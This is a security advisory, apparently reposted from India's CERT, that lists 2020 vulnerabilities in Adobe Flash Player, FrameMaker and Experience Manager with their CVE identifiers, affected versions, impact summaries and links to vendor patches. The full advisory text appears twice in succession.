Severity Rating: HIGH
Software Affected
Adobe Flash Player Desktop Runtime Version 32.0.0.371 and earlier
Adobe Flash Player for Google Chrome Version 32.0.0.371 and earlier
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 Version
32.0.0.330 and earlier
Adobe Framemaker Version 2019.0.5 and below
Adobe Experience Manager Version 6.5 and earlier
Overview
Multiple vulnerabilities have been reported in Adobe which could allow a
remote attacker to obtain sensitive information, conduct Cross-site
scripting and execute arbitrary code on the targeted system.
Description
1. Use After Free Vulnerability ( CVE-2020-9633 )
A use-after-free vulnerability exists in Adobe Flash Player.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system in the context of the current
user.
2. Memory Corruption Vulnerability ( CVE-2020-9636 )
A memory corruption vulnerability exists in Adobe Framemaker. A remote
attacker could exploit this vulnerability by persuading a victim to open a
specially-crafted document.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system or cause the application to
crash.
3. Out-of-Bounds Write Vulnerability ( CVE-2020-9634 CVE-2020-9635 )
These vulnerabilities exist in Adobe Framemaker due to an out-of-bounds
write error. A remote attacker could exploit this vulnerability by
persuading a victim to open a specially-crafted document.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system or cause the application to
crash.
4. Server-side request forgery (SSRF)Vulnerability ( CVE-2020-9643
CVE-2020-9645 )
This vulnerability exists in Adobe Experience Manager (AEM) due server-side
request forgery. A remote attacker could exploit this vulnerability by
conducting SSRF attack.
Successful exploitation of this vulnerability could allow the attacker to
obtain sensitive information on the targeted system.
5. Cross-site scripting(DOM-based) Vulnerability ( CVE-2020-9647 )
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by injecting malicious script into a Web page.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
6. Cross-site scripting Vulnerability ( CVE-2020-9648 CVE-2020-9651 )
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by using a specially-crafted URL.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
7. Cross-site scripting(stored) Vulnerability ( CVE-2020-9644 )
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by injecting malicious script into a Web page.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
Solution
Update to the latest versions as available at the following URLs:
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
Vendor Information
Adobe
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
References
Adobe
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
CVE Name
CVE-2020-9633
CVE-2020-9636
CVE-2020-9634
CVE-2020-9635
CVE-2020-9643
CVE-2020-9645
CVE-2020-9647
CVE-2020-9648
CVE-2020-9651
CVE-2020-9644
Software Affected
Adobe Flash Player Desktop Runtime Version 32.0.0.371 and earlier
Adobe Flash Player for Google Chrome Version 32.0.0.371 and earlier
Adobe Flash Player for Microsoft Edge and Internet Explorer 11 Version
32.0.0.330 and earlier
Adobe Framemaker Version 2019.0.5 and below
Adobe Experience Manager Version 6.5 and earlier
Overview
Multiple vulnerabilities have been reported in Adobe which could allow a
remote attacker to obtain sensitive information, conduct Cross-site
scripting and execute arbitrary code on the targeted system.
Description
1. Use After Free Vulnerability ( CVE-2020-9633 )
A use-after-free vulnerability exists in Adobe Flash Player.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system in the context of the current
user.
2. Memory Corruption Vulnerability ( CVE-2020-9636 )
A memory corruption vulnerability exists in Adobe Framemaker. A remote
attacker could exploit this vulnerability by persuading a victim to open a
specially-crafted document.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system or cause the application to
crash.
3. Out-of-Bounds Write Vulnerability ( CVE-2020-9634 CVE-2020-9635 )
These vulnerabilities exist in Adobe Framemaker due to an out-of-bounds
write error. A remote attacker could exploit this vulnerability by
persuading a victim to open a specially-crafted document.
Successful exploitation of this vulnerability could allow the attacker to
execute arbitrary code on the targeted system or cause the application to
crash.
4. Server-side request forgery (SSRF)Vulnerability ( CVE-2020-9643
CVE-2020-9645 )
This vulnerability exists in Adobe Experience Manager (AEM) due server-side
request forgery. A remote attacker could exploit this vulnerability by
conducting SSRF attack.
Successful exploitation of this vulnerability could allow the attacker to
obtain sensitive information on the targeted system.
5. Cross-site scripting(DOM-based) Vulnerability ( CVE-2020-9647 )
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by injecting malicious script into a Web page.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
6. Cross-site scripting Vulnerability ( CVE-2020-9648 CVE-2020-9651 )
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by using a specially-crafted URL.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
7. Cross-site scripting(stored) Vulnerability ( CVE-2020-9644 )
This vulnerability exists in Adobe Experience Manager (AEM) due to improper
validation of user-supplied input. A remote attacker could exploit this
vulnerability by injecting malicious script into a Web page.
Successful exploitation of this vulnerability could allow the attacker to
steal the cookie-based authentication credentials on the targeted system.
Solution
Update to the latest versions as available at the following URLs:
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
Vendor Information
Adobe
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
References
Adobe
https://helpx.adobe.com/security/products/flash-player/apsb20-30.html
https://helpx.adobe.com/security/products/framemaker/apsb20-32.html
https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
CVE Name
CVE-2020-9633
CVE-2020-9636
CVE-2020-9634
CVE-2020-9635
CVE-2020-9643
CVE-2020-9645
CVE-2020-9647
CVE-2020-9648
CVE-2020-9651
CVE-2020-9644
About Cert Advisory
We have created this blog to provide latest security advisory from the india cert for the security vulnerability, threats, attacks and patching required to mitigate any kind of cyber attacks.